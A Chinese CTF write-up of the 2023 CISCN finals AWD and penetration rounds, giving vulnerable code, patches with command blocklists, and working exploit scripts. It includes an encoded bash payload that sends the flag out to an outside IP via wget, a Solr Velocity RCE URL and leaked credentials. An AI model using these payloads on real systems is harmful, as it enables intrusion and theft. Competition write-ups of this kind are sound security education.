2023 CISCN 总决赛 AWD & 渗透 Writeup
AWD
easyphp
开局 D 盾扫出来两个 system 后门, 位于 1.php 和 index.php
1
2
3
4
5
6
7
8
9
10
11
|
if(isset($_POST['user']))
{
$_SESSION['user'] = unserialize($_POST['user']);
}
......
if($_SESSION['user']['usertype'] === "super"){
system($_POST['cmd']);
unset($_SESSION['user']);
}else{
echo $_SESSION['user'];
}
|
注释掉就行了
然后 /admin/api.php 有个 call_user_func
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
function getdo($field = 'do', $default = false)
{
if (!isset($_GET['do'])) return $default;
return $_GET['do'];
}
function getcid($field = 'cid', $default = false)
{
if (!isset($_POST['cid'])) return $default;
return $_POST['cid'];
}
$do = getdo();
$cid = getcid();
call_user_func($do,$cid);
|
加个过滤
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
function getdo($field = 'do', $default = false)
{
if (!isset($_GET['do'])) return $default;
if (preg_match('/(system|exec|shell_exec|passthru|eval|assert)/i', $_GET['do'])) {
die('hacker');
}
return $_GET['do'];
}
function getcid($field = 'cid', $default = false)
{
if (!isset($_POST['cid'])) return $default;
if (preg_match('/(system|exec|shell_exec|passthru|eval|assert)/i', $_POST['cid'])) {
die('hacker');
}
return $_POST['cid'];
}
|
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
def attack(target):
try:
print('attack', target)
s = requests.Session()
s.post(target + '/login.php?action=login', data={
'account': 'admin',
'password': 'admin'
})
res = s.post(target + '/admin/api.php?do=system', data={
'cid': 'cat /flag'
}, timeout=3)
result = re.findall('flag{.*?}', res.text)
if result:
flag = result[0]
print('find flag',flag)
flags.put(flag)
except Exception:
pass
|
至于其它地方有没有洞我也不清楚我也懒得看了, AWD 气氛太紧张了 php 不怎么能看得下去 (
easyjava
这道题比较有意思, 开局手速快抢了一堆 flag, 然后题目修好之后再也没有被打过, 最后光是这道题就拿了 2.4w 多分
首先有 thymeleaf ssti
1
2
3
4
5
6
7
8
9
10
11
12
|
@Controller
public class AboutController {
@GetMapping({"/about"})
public String about(HttpSession session, @RequestParam(defaultValue = "") String type) {
String username = (String)session.getAttribute("name");
if (StringUtils.isEmpty(username))
return "about/tourist/about";
if (!type.equals(""))
return "about/" + type + "/about";
return "about/user/about";
}
}
|
type 可控, 而且 500 页面有错误回显, 拿 exp 直接打就行
修复
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
@Controller
public class AboutController {
@GetMapping({"/about"})
public String about(HttpSession session, @RequestParam(defaultValue = "") String type) {
String username = (String)session.getAttribute("name");
if (StringUtils.isEmpty(username))
return "about/tourist/about";
if (!type.equals("")) {
if (type.equals("system"))
return "about/system/about";
if (type.equals("tourist"))
return "about/tourist/about";
if (type.equals("user"))
return "about/user/about";
return "index";
}
return "about/user/about";
}
}
|
然后 /logout 路由存在任意方法调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
@Controller
public class LogOutController {
@GetMapping({"/logout"})
public String logout(HttpServletRequest request, HttpSession session, @RequestParam(defaultValue = "logout") String method, @RequestParam(defaultValue = "com.mengda.awd.Utils.SessionUtils") String targetclass) throws Exception {
Class<?> ObjectClass = Class.forName(targetclass);
Constructor<?> constructor = ObjectClass.getDeclaredConstructor(new Class[0]);
constructor.setAccessible(true);
Object CLassInstance = constructor.newInstance(new Object[0]);
try {
if (method.equals("logout")) {
Method targetMethod = ObjectClass.getMethod(method, new Class[] { HttpSession.class });
targetMethod.invoke(CLassInstance, new Object[] { session });
} else {
Method targetMethod = ObjectClass.getMethod(method, new Class[] { String.class });
targetMethod.invoke(CLassInstance, new Object[] { request.getHeader("X-Forwarded-For") });
}
} catch (Exception e) {
return "redirect:/";
}
return "redirect:/";
}
}
|
这个没有回显, 需要手动搭一个 http 或者随便其它什么东西来传一下 flag
修复
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
@Controller
public class LogOutController {
@GetMapping({"/logout"})
public String logout(HttpServletRequest request, HttpSession session, @RequestParam(defaultValue = "logout") String method, @RequestParam(defaultValue = "com.mengda.awd.Utils.SessionUtils") String targetclass) throws Exception {
String[] blackList = {
"cat", "flag", "exec", "tac", "/", "*", "sh", "bash", "Runtime", "ProcessBuilder",
"ProcessImpl", "UNIXProcess", "File", "Read", "run", "build", "start" };
for (String s : blackList) {
if ("X-Forwarded-For".contains(s))
return "index";
}
for (String s : blackList) {
if (targetclass.contains(s))
return "index";
}
for (String s : blackList) {
if (method.contains(s))
return "index";
}
Class<?> ObjectClass = Class.forName(targetclass);
Constructor<?> constructor = ObjectClass.getDeclaredConstructor(new Class[0]);
constructor.setAccessible(true);
Object CLassInstance = constructor.newInstance(new Object[0]);
try {
if (method.equals("logout")) {
Method targetMethod = ObjectClass.getMethod(method, new Class[] { HttpSession.class });
targetMethod.invoke(CLassInstance, new Object[] { session });
} else {
Method targetMethod2 = ObjectClass.getMethod(method, new Class[] { String.class });
targetMethod2.invoke(CLassInstance, new Object[] { request.getHeader("X-Forwarded-For") });
}
return "redirect:/";
} catch (Exception e) {
return "redirect:/";
}
}
}
|
Filter 存在任意文件读取
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
@WebFilter(urlPatterns = {"/*"})
public class myFilter implements Filter {
public void init(FilterConfig filterConfig) throws ServletException {
super.init(filterConfig);
}
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
HttpServletRequest request = (HttpServletRequest)servletRequest;
String request_uri = URLDecoder.decode(request.getRequestURI(), "utf-8");
if (Check.check(request_uri).booleanValue()) {
String static_resources_path = "/usr/local/tomcat/webapps/app/WEB-INF/classes/static/" + request_uri;
static_resources_path = URLDecoder.decode(static_resources_path, "utf-8");
try {
servletResponse.getWriter().write(File.readFile(static_resources_path));
} catch (Exception e) {
servletResponse.getWriter().write("error~");
}
} else {
filterChain.doFilter(servletRequest, servletResponse);
}
}
public void destroy() {
super.destroy();
}
}
|
修复 (直接对 File 类下手)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
public class File {
public static String readFile(String filePath) throws Exception {
String[] blackList = { "flag", ".." };
for (String s : blackList) {
if (filePath.contains(s))
return "hacker";
}
String file_content = "";
FileInputStream fileInputStream = null;
try {
try {
fileInputStream = new FileInputStream(filePath);
byte[] bytes = new byte[4];
while (true) {
int readCount = fileInputStream.read(bytes);
if (readCount == -1)
break;
file_content = file_content + new String(bytes, 0, readCount);
}
fileInputStream.close();
} catch (FileNotFoundException e) {
e.printStackTrace();
fileInputStream.close();
}
return file_content;
} catch (Throwable th) {
fileInputStream.close();
throw th;
}
}
}
|
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
def attack1(target):
try:
cmd = 'cat /flag'
print('attack', target)
s = requests.Session()
s.get(target + '/setlogin')
# method 1
res = s.get(target + '/about?type=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat%20/flag").getInputStream()).next()%7d__::.x', timeout=3)
result = re.findall('flag{.*?}', res.text)
if result:
flag = result[0]
print('find flag',flag)
flags.put(flag)
except Exception:
pass
def attack2(target):
try:
cmd = 'cat /flag'
print('attack', target)
s = requests.Session()
s.get(target + '/setlogin')
# method 2
s.get(target + '/logout?targetclass=java.lang.Runtime&method=exec', headers={
'X-Forwarded-For': 'bash -c {echo,d2dldCAxNzUuMjEuMjYuMTY1OjU1NTUvP2ZsYWc9YGNhdCAvZmxhZ2A=}|{base64,-d}|{bash,-i}'
})
print('send to', target)
except Exception:
pass
time.sleep(0.5)
|
designCMS
提交评论的用户名如果以 bash: 开头的话就可以直接执行命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
package BOOT-INF.classes.com.puboot.common.util;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.stream.Collectors;
public class SecureUtil {
public static String sqlFilter(String str) throws IOException {
if (str.startsWith("bash:"))
return (new BufferedReader(new InputStreamReader((new ProcessBuilder(new String[] { "bash", "-c", str.substring(5) })).start().getInputStream()))).lines().collect(Collectors.joining("\n"));
return str;
}
}
|
修也好修, 直接 return 就行
然后还有任意文件下载
1
2
3
4
5
6
7
8
|
@GetMapping({"download"})
public ResponseEntity download(HttpServletRequest request, String fileName) throws IOException {
File file = new File("/opt/design_cms/uploads/" + fileName);
if (!file.exists())
return ResponseEntity.ok("File Not Exists!");
InputStreamResource resource = new InputStreamResource(Files.newInputStream(file.toPath(), new java.nio.file.OpenOption[0]));
return ResultUtil.success(file, resource);
}
|
这个当时比赛的时候没修好, 因为直接拿反编译出来的源码再编译好像有点问题, 然后手动写的话看着 BlogApiController import 了一堆其它 class 比较头大…
写这篇 writeup 的时候才反应过来可以直接改 ResultUtil, 还更简单…
最后是 fastjson 1.2.47
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
@GetMapping({"/blog/search"})
public String search(HttpServletRequest request, Model model, String search) {
JSONObject article = null;
try {
article = JSONObject.parseObject(search);
} catch (Exception e) {
e.printStackTrace();
}
System.out.println(article);
List<BizArticle> articleList = this.bizArticleService.searchList(article.getString("title"));
if (articleList == null)
throw new ArticleNotFoundException();
try {
model.addAttribute("pageUrl", article.getString("pageUrl"));
model.addAttribute("articleList", articleList);
} catch (Exception e) {
e.printStackTrace();
}
String name = this.bizThemeService.selectCurrent().getName();
return "theme/" + name + "/search";
}
|
同样没修好, 当时不知道咋回事脑抽了以为不出网死活不想打 JNDI, 一直在想能不能打 BCEL 然后 payload 调了半天没打通 (
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
def attack(target):
try:
cmd = 'cat /flag'
print('attack', target)
s = requests.Session()
s.post(target + '/blog/api/comments', data={
'sid': -1,
'nickname': 'bash:cat /flag',
'email': '[email protected]',
'content': '<p>sadasd</p>'
})
res = s.post(target + '/blog/api/comments', data={
'sid': -1,
'pageNumber': 1,
'pageSize': 10,
'status': 1
})
# res = s.get(target + '/blog/api/download' ,params={'fileName': '../../../../../../../../flag'})
result = re.findall('(flag{.*?})', res.text)
if result:
flag = result[0]
print('find flag',flag)
flags.put(flag)
except Exception:
pass
|
渗透
入口点有 22, 80, 10000 端口
10000 端口是 solr, 存在 Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
1
|
http://175.21.26.250:10000/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
|
进去后发现是 docker 环境, 没逃逸成功 ? Pwnkit 试了下好像没用 (具体忘了)
80 端口访问是 apache default page, 扫一下目录发现存在 phpmyadmin, 弱口令没试出来
后来发现 solr 里面有个 txt
1
2
3
4
|
solr@6d7d0aead613:/opt/solr$ cat txt
cat txt
phpmyadmin:debian-sys-maint/V5NnKd3hzziy219s
sunflower:11.0.0.33162
|
登进去之后直接拿 phpmyadmin 4.8.1 版本的 lfi 拿 shell
之后 Pwnkit 提权拿到 root, 改密码 22 端口连上去, 发现 80 端口也是 docker 环境, 但是挂载了宿主机的 /var/www 目录
之后需要根据题目给的信息, 在这台机器上手动加路由表, 才能访问 10.x 的 ip 段
10.10.100.100 是 Structs2
Struts2 试了一堆 payload 没成功, 最后好像是要打 log4j ? 有点抽象
10.10.100.200 3306 端口 mysql 弱口令 root/123456, 80 端口是 discuz X3.4
mysql 连上去 load file 就能拿到 flag, 但是因为是 mysql 权限写不了 webshell, udf 也写不进去, 我还以为 web 下面还有个 flag
之后捣鼓了半天的 discuz, 手动把后台和 ucenter 的密码替换登陆上去 (真的卡), 然后尝试照着一些方法去 getshell 最后还把站插挂了(
后来听其它人说 mysql 和 discuz 的 flag 都是一样的 , 所以其实并不用去研究 discuz
另外一个段, 不过没打进去
1
2
3
4
5
6
7
|
[*]10.1.15.10
[->]adlab-win2016
[->]10.1.15.10
[*] NetInfo:
[*]10.1.15.20
[->]e0718e25-a976-4
[->]10.1.15.20
|
说是 clash rce 还有向日葵
比赛结束之后才发现哦原来之前 txt 里面的 sunflower 就是向日葵 (sunlogin) ?
后记
比赛期间自己机器不给通外网, 但是可以用主办方提供的公共机器联网查资料
网速不是很好… 搜到的 exp 都在 GitHub 上, 但是 GitHub 基本打不开
去 Gitee 找源码在网页端下载的时候发现需要登录才能继续下载, 我 tm 直接没绷住